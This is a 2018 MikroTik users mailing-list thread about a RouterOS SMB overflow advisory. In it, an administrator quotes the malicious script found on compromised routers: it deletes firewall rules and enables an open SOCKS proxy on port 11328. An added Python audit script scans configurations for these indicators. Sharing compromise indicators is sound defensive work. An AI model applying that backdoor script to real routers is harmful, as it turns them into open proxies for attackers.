> I have not tested this yet but
>  
> https://www.coresecurity.com/advisories/mikrotik-routeros-smb-buffer-overflow
> 
> :: // Shawn Peppers
> :: // DirectlinkAdmin.com


Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

2018-08-05 Thread Bruce Bridegwater via Mikrotik-users
FYI, credit to J.P. Douros from RPM Provisioning Management for bringing it to 
our attention and providing the solution.

RPM manages our Cisco UBR10k CMTS.

Great support company.

From: mikrotik-users-boun...@wispa.org  on 
behalf of Bob Pensworth via Mikrotik-users 
Sent: Sunday, August 5, 2018 7:57:53 PM
To: 'Shawn C. Peppers'; 'Mikrotik Users'
Subject: Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

We are finding an IP/Socks connection:
We are finding an event entry in System/Scheduler
And the (below) script in System/Script:

/ip firewall filter remove [/ip firewall filter find where comment ~ "port [0-9]*"];
/ip socks set enabled=yes port=11328 max-connections=255 connection-idle-timeout=60;
/ip socks access remove [/ip socks access find];
/ip firewall filter add chain=input protocol=tcp port=11328 action=accept comment="port 11328";
/ip firewall filter move [/ip firewall filter find comment="port 11328"] 1;

--
Bob Pensworth, WA7BOB | General Manager
CresComm WiFi, LLC<http://www.crescommwifi.com/> | (360) 928-, x1

From: mikrotik-users-boun...@wispa.org  On 
Behalf Of Shawn C. Peppers via Mikrotik-users
Sent: Friday, March 16, 2018 11:54 AM
To: mikrotik-users@wispa.org; memb...@wisp.org
Subject: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

I have not tested this yet but

https://www.coresecurity.com/advisories/mikrotik-routeros-smb-buffer-overflow
:: // Shawn Peppers
:: // DirectlinkAdmin.com<http://DirectlinkAdmin.com>


Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

2018-08-05 Thread Bob Pensworth via Mikrotik-users
We are finding an IP/Socks connection:

We are finding an event entry in System/Scheduler

And the (below) script in System/Script:

 

/ip firewall filter remove [/ip firewall filter find where comment ~ "port [0-9]*"];
/ip socks set enabled=yes port=11328 max-connections=255 connection-idle-timeout=60;
/ip socks access remove [/ip socks access find];
/ip firewall filter add chain=input protocol=tcp port=11328 action=accept comment="port 11328";
/ip firewall filter move [/ip firewall filter find comment="port 11328"] 1;

 

-- 

Bob Pensworth, WA7BOB | General Manager

  CresComm WiFi, LLC | (360) 928-, x1

 

From: mikrotik-users-boun...@wispa.org  On 
Behalf Of Shawn C. Peppers via Mikrotik-users
Sent: Friday, March 16, 2018 11:54 AM
To: mikrotik-users@wispa.org; memb...@wisp.org
Subject: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

 

I have not tested this yet but

 

https://www.coresecurity.com/advisories/mikrotik-routeros-smb-buffer-overflow

:: // Shawn Peppers

:: // DirectlinkAdmin.com  
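
An added example, not part of the original message: a Python audit of a RouterOS `/export` for the indicators reported above (SOCKS enabled, an input accept rule commented "port NNNN", scheduler entries, and scripts that touch /ip socks). The export text is a constructed sample, and the scheduler and script names in it are placeholders because the message does not give them.

```python
import re

# Constructed sample of a RouterOS "/export"; entry names are placeholders.
SAMPLE_EXPORT = r'''
/ip socks
set connection-idle-timeout=1m enabled=yes max-connections=255 port=11328
/ip firewall filter
add action=accept chain=input comment="port 11328" port=11328 protocol=tcp
add action=accept chain=input comment="allow l2tp" dst-port=1701 protocol=udp
add action=drop chain=input comment="drop everything else"
/system scheduler
add interval=30s name=example_sched on-event=example_script
/system script
add name=example_script source="/ip socks set enabled=yes \
    port=11328"
'''

# key=value pairs; a quoted value is consumed whole so text inside it is not re-parsed
KV = re.compile(r'([\w-]+)=("(?:[^"\\]|\\.)*"|\S+)')

def parse_export(text):
    """Yield (menu, properties) per command, joining backslash-continued lines."""
    menu, pending = None, ""
    for raw in text.splitlines():
        if raw.rstrip().endswith("\\"):
            pending += raw.strip()[:-1]
            continue
        line, pending = pending + raw.strip(), ""
        if line.startswith("/"):
            menu = line
        elif line and not line.startswith("#"):
            yield menu, {k: v.strip('"') for k, v in KV.findall(line)}

def audit(text):
    """Return findings matching the indicators described in the message above."""
    findings = []
    for menu, p in parse_export(text):
        if menu == "/ip socks" and p.get("enabled") == "yes":
            findings.append(f"SOCKS enabled on port {p.get('port', 'default')}")
        elif (menu == "/ip firewall filter" and p.get("chain") == "input"
              and p.get("action") == "accept"
              and re.fullmatch(r"port [0-9]+", p.get("comment", ""))):
            findings.append(f"input accept rule with comment '{p['comment']}'")
        elif menu == "/system scheduler" and "name" in p:
            findings.append(f"scheduler '{p['name']}' runs '{p.get('on-event')}'")
        elif menu == "/system script" and "/ip socks" in p.get("source", ""):
            findings.append(f"script '{p.get('name')}' changes /ip socks")
    return findings

if __name__ == "__main__":
    for finding in audit(SAMPLE_EXPORT):
        print("FINDING:", finding)
```

Every scheduler entry is listed for review rather than matched by name, so legitimate scheduled jobs will also appear and need to be checked against what the operator configured.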



Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

2018-03-19 Thread Dennis Burgess via Mikrotik-users
Yes, but why would you enable SMB in MT ☺ lol. I know people who do but 
still... lol

Dennis Burgess
www.linktechs.net – 314-735-0270 x103 – 
dmburg...@linktechs.net

From: mikrotik-users-boun...@wispa.org 
[mailto:mikrotik-users-boun...@wispa.org] On Behalf Of Shawn C. Peppers via 
Mikrotik-users
Sent: Friday, March 16, 2018 1:54 PM
To: mikrotik-users@wispa.org; memb...@wisp.org
Subject: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

I have not tested this yet but

https://www.coresecurity.com/advisories/mikrotik-routeros-smb-buffer-overflow
:: // Shawn Peppers
:: // DirectlinkAdmin.com


Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

2018-03-16 Thread Josh Luthman via Mikrotik-users
I really hate the whole SMB package on RouterOS if I'm honest.


Josh Luthman
Office: 937-552-2340
Direct: 937-552-2343
1100 Wayne St
Suite 1337
Troy, OH 45373

On Fri, Mar 16, 2018 at 3:13 PM, Lewis Bergman via Mikrotik-users <
mikrotik-users@wispa.org> wrote:

> I would hope few are using MT in that fashion.
>
> On Fri, Mar 16, 2018 at 1:53 PM Shawn C. Peppers via Mikrotik-users <
> mikrotik-users@wispa.org> wrote:
>
>> I have not tested this yet but
>>
>> https://www.coresecurity.com/advisories/mikrotik-routeros-smb-buffer-overflow
>>
>> :: // Shawn Peppers
>> :: // DirectlinkAdmin.com